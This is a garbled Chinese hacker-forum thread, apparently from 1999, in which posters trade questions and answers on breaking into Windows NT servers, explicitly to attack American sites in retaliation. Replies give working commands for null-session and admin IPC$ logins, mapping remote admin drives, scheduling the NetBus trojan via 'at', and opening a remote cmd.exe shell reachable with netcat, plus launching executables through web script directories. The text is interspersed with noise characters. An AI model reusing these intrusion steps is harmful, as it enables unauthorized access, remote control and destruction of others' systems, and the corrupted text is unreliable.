《版主頁黑客工具和文章的幾個問題》中提到:, V+ U$ y5 O! ]- ^
請教��,從版主頁上載得PINGER�,GRINDER,LETMEIN等�����,卻不能用�,PINGER安裝后,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER����。EXE����,40多K����,運行PINGER,設置好IP�,點PING,彈出一個窗口(C++�����。�。。)�����,說出錯�����,然后關閉了���,何故����,是不是安裝有誤��? 2����。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN��。EXE到不存在的NETAPI32��。DLL��;NETGROUPGETUSERS�����。 是否說明需要NETAPI32����。DLL文件,哪里有該DLL����。 3�����。USAKILLER 的教學文章中提到需在WINNT4�。0下運行以下步驟等����,是否要求我的操作系統(tǒng)也是WINNT4。0 ���,應該不是吧���? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT��,還是服務器的操作系統(tǒng)為NT���? 太多的問題需高手回答����,我花那么多的時間和金錢下載這幾M文件卻不能用��,實在窩囊哦�, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章,以提高我國黑客水平���。
2 H! j6 N9 T- h% b4 }& \> 我的機子MMX166���,WIN98,2�����。5G�����,32M內(nèi)存��。0 {/ s2 e" B. I
q' d5 @" _2 U9 S
黑客并不神秘�,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點���,輔助相關的工具���,就可以成功。
4 ~4 F; ]7 O9 h# F你的問題是,pinger, grinder, letmein等工具必須要在NT上運行��,我們強烈建議���,你一定要安裝NT���,對于你的機器配制,和我們現(xiàn)在差不多�,只是比你多了32M內(nèi)存,2G硬盤����。
6 {" j: u2 Y) w其實,攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了�,比如,我們在NT上攻擊某服務器�,該服務器為NT4.0,我們將做如下簡單事情就有可能成功���,假設目標NT的IP地址為111.111.111.111����,做法如下:
$ U6 s. n' Z0 z& U3 y3 |7 t0 Hnet use \\111.111.111.111\ipc$ "" /user:""/ x! c& @6 ?3 R: a
net.exe是NT的工具文件,該命令將和目標服務器建立Null Session����,如果成功����,你可以查看該服務器上的共享目錄:5 k4 s' h* [1 X$ ?8 a' K6 s
net view \\111.111.111.111
! p$ A4 o) `) }, N7 X2 l1 \/ f當然,如果你有該NT管理員密碼�����,就更好辦了�,假設其管理員Admin密碼為fuck:7 c* |5 ]5 C) o
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin", f# c8 W, D8 \4 U1 U/ [
命令成功后,幾乎所有目標NT上的配制��,資源�����,你都可以在你本地NT上連接遠程計算機來查看或修改:
' u j: l+ }+ r) ]$ o1�����、查看或修改遠程機器上的硬盤�,假如目標NT上有C、D兩個硬盤:0 @. O) w, H/ S) m7 I5 Q7 b2 f
net use x: \\111.111.111.111\c$
( I4 f1 t* e/ Y: [* ?6 ], g' dnet use y: \\111.111.111.111\d$
3 }, L& m& d( q5 l3 A1 D這樣,目標NT上的C��、D盤分別被影射為你本地的X��、Y盤���,你想怎么做都可以...0 c; l+ L* u3 C$ i7 ? l
2��、管理目標NT的用戶: I3 q |9 v C# ^
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域” A& x; L* v/ [; @
鍵入\\111.111.111.111后��,目標NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣
) h8 j# G4 n; h2 k3、管理目標NT的服務
$ f- B& a* p9 ]9 a6 p選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”* q: A8 o% F/ ?# X( f
這樣你可以管理目標NT上的服務���,共享目錄
% I5 S# V, h4 R, M4�、IIS管理
6 A$ f+ G+ h: m: @1 v: m+ }) c. j0 g1 c選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.1115 Y: U% ?( S* c6 ?* z
目標NT的FTP��、WWW服務你就可以重新配置
1 a" [5 q# J+ T9 _# {* M( i$ B5����、事件管理) S* p, r7 E7 p5 G1 @7 U, e5 Q
“事件查看器”->連接到服務器->111.111.111.111
- x# A4 K6 T }$ P; H7 ~8 N
, \; V; d. } `7 ^6 ]還有更多的東西,都可以用NT本身的功能來完成�����,這些都是95, 98所不能實現(xiàn)的。. ]% Y, W/ W: V: S3 ~
* y7 s! [* |, z$ l& J! s當然����,98,95也能做一些事情����,但很麻煩,比如:+ u' g8 U* M- U4 p( ~, z- D
net use \\111.111.111.111\ipc$% L7 ?( G( |6 c7 a/ \5 G
net use z: \\111.111.111.111\d$1 }8 O3 T* r+ r, K; V/ _6 {
但其后不能帶參數(shù)�����,即改用其他用戶或密碼�����,系統(tǒng)將用當前用戶和密碼去登錄�,如果你知道目標NT的用戶或密碼,重新啟動95, 98���,改用該用戶和密碼登錄�����,方可實現(xiàn)�,你可以連接目標NT上的共享資源,但不能進行管理���,如用戶��、事件等
8 |! B% A6 c9 g6 l3 [0 l6 g* S% C6 i6 U0 z- u% G" P: H' J
我們強烈建議各位有心要為死難者報仇�����,真正的想黑霉國的站點�����,花點時間�,裝個NT吧����,NT Workstation也可以! Q% w1 g( m0 q4 d
這樣����,你還可以了解目標機器上能有什么東東供你去用!
, j1 V* _. T3 `
; d: m1 J; o1 K5 A& p! C9 n" a1 d# V$ g8 B9 d
--------------------------------------------------------------------------------
9 F4 \% M2 h i
. g0 F6 V+ R7 G4 n# h6 y8 k$ Q>quack于1999-06-12��,23:37:444 ]( Z, |; Y1 U7 q& r' l
在大作《幾個有關黑的問題》中提到:
9 b J8 `- K2 t首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。% E3 z$ _+ V& G) o, ~1 @& k
* Z* t E9 l: E/ Xkillusa于1999-06-13��,03:25:15
0 w! \& B7 C& h" p% f0 q$ s* J9 m在大作《Re: 幾個有關黑的問題》中提到:
- ?* s& ?+ g8 B( f* D8 }( V0 w' D
letmein.exe 暫時沒有mypwd參數(shù)���,十分抱歉
! U4 \+ H0 r/ P! P$ fpinger程序���,只是利用ping來尋找主機,每臺NT服務器有一個主IP地址�,但也可以設置多個輔助IP地址�����,比如有些服務器供應商��,一臺NT服務器上可以設置一千多個IP����,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址����,所以有時顯示只有IP,而無主機名��。另外,有些服務器是非NT的操作系統(tǒng)��,有時將不會顯示主機名��。當然�,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況�����。1 f w) r0 X( z+ l, B% ~. u
; K1 t$ V' Q3 J/ s
Netbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序�,所以,netbus.exe是不用上傳的��,只需在目的
( L" r" T0 z6 f服務器上運行ntsrv.exe���,而在目的服務器運行該程序有很多種方法:
L2 y/ Q* W! }$ F' N% D
' G ^, l) x q$ e$ Q( S8 C1��、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序��,具體使用方法�,可在自己的NT Dos窗口下鍵入以下:0 v" W' x, b+ d
$ F, r2 e7 F# b: ^" U
C:\>net start schedule' o% R9 a! ~: s: U2 C: h4 w
Schedule 正在啟動服務.....
; Q' H+ ~, \/ ] V, xSchedulw 服務啟動成功��。6 X. m# n: z- m! A0 f) W. P4 S
C:\>at /?
3 f/ v! B+ K( H& cAT 命令排定在特定的日期和時間運行某些命令和程序�。
1 F9 {- \& z" N/ Y: A2 y- p/ D運行 AT 命令之前必須先啟動 Schedule 服務�。: b7 \ j# L- C/ G% A
( ~" V& c. C# p, j' o
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
% H; L, @1 m3 {AT [\\computername] time [/INTERACTIVE]
; O2 z$ }" @% {: A) M[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
0 h4 s; H# U. F$ k3 [- h
/ l$ o" M, p8 E* ~3 b0 r1 H7 X\\computername 指定遠程計算機���。 如果省略這個參數(shù)
1 H6 f& w& r4 x- q A A- ?/ f, n/ z命令會被排定在本機上運行���。
! A8 u! D2 c" y/ q4 o) q# O, I/ Gid 指定給排定進度命令的識別號。
* ~4 P( m1 |: o' z- s4 X$ }$ a$ }- {* |
/delete 刪除某個已排定進度的命令���。如果省略標識����,計算機上所有已排定進度的命令都會被刪除����。
4 X$ a' |) j# A: x/ t& m/yes 用于刪除所有作業(yè)���,且不想在運行刪除時顯示確認信息 ���。
, D3 U8 _$ R) t; K0 q. Z( Itime 指定命令運行的時間。+ j' f0 [6 ~; L' a8 |8 h W
/interactive 允許作業(yè)在運行時����,與用戶通過桌面交互��。! ^) s; M; U; Q: B, b0 A
8 W' o3 b- H% G% B
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令��。
2 P3 M3 L8 \0 |+ Q: v7 d* w& S如果省略日期�����,則默認為在每月的本日運行��。
( v l$ D4 G% p, L: @
( ~, Z5 g& Q# R; ~& o( k! O/next:date[,...] 指定在下一個指定日期 (如�����,下周三)��,運行命令�����。如果省略日期�����,則默認為在每月的本日運行��。. D) a4 `8 ~: U; _3 ^
+ \0 L- c* B+ i- {
"command" 準備運行的 Windows NT 命令或批處理文件��。7 E7 k* K; _) x, k
$ ^! W6 W. I3 D. j9 c3 T* WC:\>) D: p: |. i2 K2 A& \4 X! }( g
7 n6 @5 I2 {8 F+ P! s3 F知道了如何使用AT�����,再來看看如何在遠程NT上運行ntsrv.exe:
1 M3 k# M2 _- m; k9 ?6 K8 e( `1 利用管理員登陸到目的服務器�,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
3 {/ ^/ K& p* N- }! T$ M1 Y2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start6 l; t9 c' e( K2 X' ~# O
3 利用AT.EXE在遠程服務器設置程序定時運行,當然最快運行最理想��,所以�,你可以用letmein.exe得到服務器的時間,然后:+ V- D9 }0 A5 a' [
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
" p O1 c1 e7 k) ~9 d# W其中00:00要改為用letmein.exe得回來的具體時間+一點容量�����,等一會后�,再在本地啟動netbus.exe,鍵入目的服務器得ip地址或hostname��,連接����!具體使用可參照 "How to get in nt"����,比如第一種方法�����,你想要在目的服務器運行 LEGION����,可以利用netbus得上傳功能�����,將LEGION上傳至目的服務器��,再用netbus的"Start program"����,鍵入完整路徑的LEGION運行程序,就ok了����!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務����,如下:在netbus中擊“App redirect”��,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321�,服務就啟動了��,然后在本地運行:nc x.x.x.x 4321����,出現(xiàn)dos啟動的畫面就表示連接成功:, T7 z; l, q; A# h+ E7 y2 H
Microsoft(R) Windows NT(TM)9 R* F7 r+ E- a5 j
(C) Copyright 1985-1996 Microsoft Corp.) W+ ]* }6 J2 q8 K$ _' l1 p) _. V, O
C:\>
/ |# n2 V0 {. I% Y: a/ H6 _, O6 P4 B
2、利用web啟動ntsrv.exe或其他程序在目的服務器/ K( `: m. e/ Z) k
. r0 R( c9 S# B: O N3 z5 |5 f! i
將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄��,如cgi-bin或scripts��,然后在瀏覽器鍵入url如:
, M% A8 i: I0 [. s# a8 u1 \9 I# ~http://x.x.x.x/scripts/ntsrv.exe /port:64321
! s# b% ^/ } [. k1 q7 N或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
! m4 E) a7 C8 X# }- J該程序就啟動了# s! C/ l7 A4 C3 R# I' }" O
) U w: f$ V+ B" M3 o3 }
我只提這幾中方法��!+ h/ s/ b2 c' O( e# `3 L; |; ~
要成功��,必須打好基礎工���,對操作系統(tǒng)充分了解!% N- g5 }* k1 @
! v% M% c. T7 P$ n7 T |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡